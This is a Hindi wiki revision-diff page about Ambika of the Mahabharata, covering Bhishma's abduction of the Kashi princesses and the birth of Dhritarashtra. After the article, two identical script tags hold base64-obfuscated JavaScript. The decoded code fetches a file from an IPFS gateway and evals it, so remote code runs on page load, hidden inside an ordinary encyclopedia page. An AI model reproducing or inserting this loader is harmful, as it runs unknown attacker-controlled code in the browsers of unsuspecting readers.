Difference between revisions of "अम्बिका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=अम्बिका|लेख का नाम=अम्बिका (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=अम्बिका|लेख का नाम=अम्बिका (बहुविकल्पी)}}
 +
{{tocright}}
 
*काशीराज इन्द्रद्युम्न की कन्या अम्बिका थीं।
 
*काशीराज इन्द्रद्युम्न की कन्या अम्बिका थीं।
 
*[[सत्यवती]] के पुत्र [[विचित्रवीर्य]] इनके पति थे।
 
*[[सत्यवती]] के पुत्र [[विचित्रवीर्य]] इनके पति थे।
 
*अम्बिका विचित्रवीर्य की पत्नी, [[अम्बा]] और [[अम्बालिका]] की बहिन थी।  
 
*अम्बिका विचित्रवीर्य की पत्नी, [[अम्बा]] और [[अम्बालिका]] की बहिन थी।  
==भीष्म ने राजाओं को हराया==
+
====भीष्म ने राजाओं को हराय====
 
[[भीष्म]] ने उसके भाई विचित्रवीर्य को राज्य सौंपने के बाद भीष्म को विचित्रवीर्य के विवाह की चिन्ता हुई। उसी समय काशीराज की तीन कन्याओं, [[अम्बा]], अम्बिका और [[अम्बालिका]] का [[स्वयंवर]] होने वाला था। भीष्म ने वहाँ जाकर अकेले ही सभी राजाओं को हरा दिया और तीनों कन्याओं का हरण करके [[हस्तिनापुर]] ले आये। बड़ी कन्या अम्बा ने भीष्म को बताया कि वह राजा [[शाल्व]] को प्रेम करती है। यह सुन कर भीष्म ने उसे राजा शाल्व के पास भिजवाया और अम्बिका और अम्बालिका का विवाह विचित्रवीर्य के साथ करवा दिया।  
 
[[भीष्म]] ने उसके भाई विचित्रवीर्य को राज्य सौंपने के बाद भीष्म को विचित्रवीर्य के विवाह की चिन्ता हुई। उसी समय काशीराज की तीन कन्याओं, [[अम्बा]], अम्बिका और [[अम्बालिका]] का [[स्वयंवर]] होने वाला था। भीष्म ने वहाँ जाकर अकेले ही सभी राजाओं को हरा दिया और तीनों कन्याओं का हरण करके [[हस्तिनापुर]] ले आये। बड़ी कन्या अम्बा ने भीष्म को बताया कि वह राजा [[शाल्व]] को प्रेम करती है। यह सुन कर भीष्म ने उसे राजा शाल्व के पास भिजवाया और अम्बिका और अम्बालिका का विवाह विचित्रवीर्य के साथ करवा दिया।  
 +
====धृतराष्ट्र का जन्म====
 +
एक वर्ष व्यतीत हो जाने पर [[वेदव्यास]] सबसे पहले बड़ी रानी अम्बिका के पास गये। अम्बिका ने उनके तेज़ से डर कर अपने नेत्र बन्द कर लिये। वेदव्यास लौट कर माता से बोले, 'माता अम्बिका का बड़ा ही तेजस्वी पुत्र होगा किन्तु नेत्र बन्द करने के दोष के कारण वह अंधा होगा। [[सत्यवती]] को यह सुन कर अत्यन्त दुःख हुआ।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 05:57, 8 May 2011

chitr:Disamb2.jpg ambika ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- ambika (bahuvikalpi)

bhishm ne rajaoan ko haray

bhishm ne usake bhaee vichitraviry ko rajy sauanpane ke bad bhishm ko vichitraviry ke vivah ki chinta huee. usi samay kashiraj ki tin kanyaoan, amba, ambika aur ambalika ka svayanvar hone vala tha. bhishm ne vahaan jakar akele hi sabhi rajaoan ko hara diya aur tinoan kanyaoan ka haran karake hastinapur le aye. b di kanya amba ne bhishm ko bataya ki vah raja shalv ko prem karati hai. yah sun kar bhishm ne use raja shalv ke pas bhijavaya aur ambika aur ambalika ka vivah vichitraviry ke sath karava diya.

dhritarashtr ka janm

ek varsh vyatit ho jane par vedavyas sabase pahale b di rani ambika ke pas gaye. ambika ne unake tez se dar kar apane netr band kar liye. vedavyas laut kar mata se bole, 'mata ambika ka b da hi tejasvi putr hoga kintu netr band karane ke dosh ke karan vah aandha hoga. satyavati ko yah sun kar atyant duahkh hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>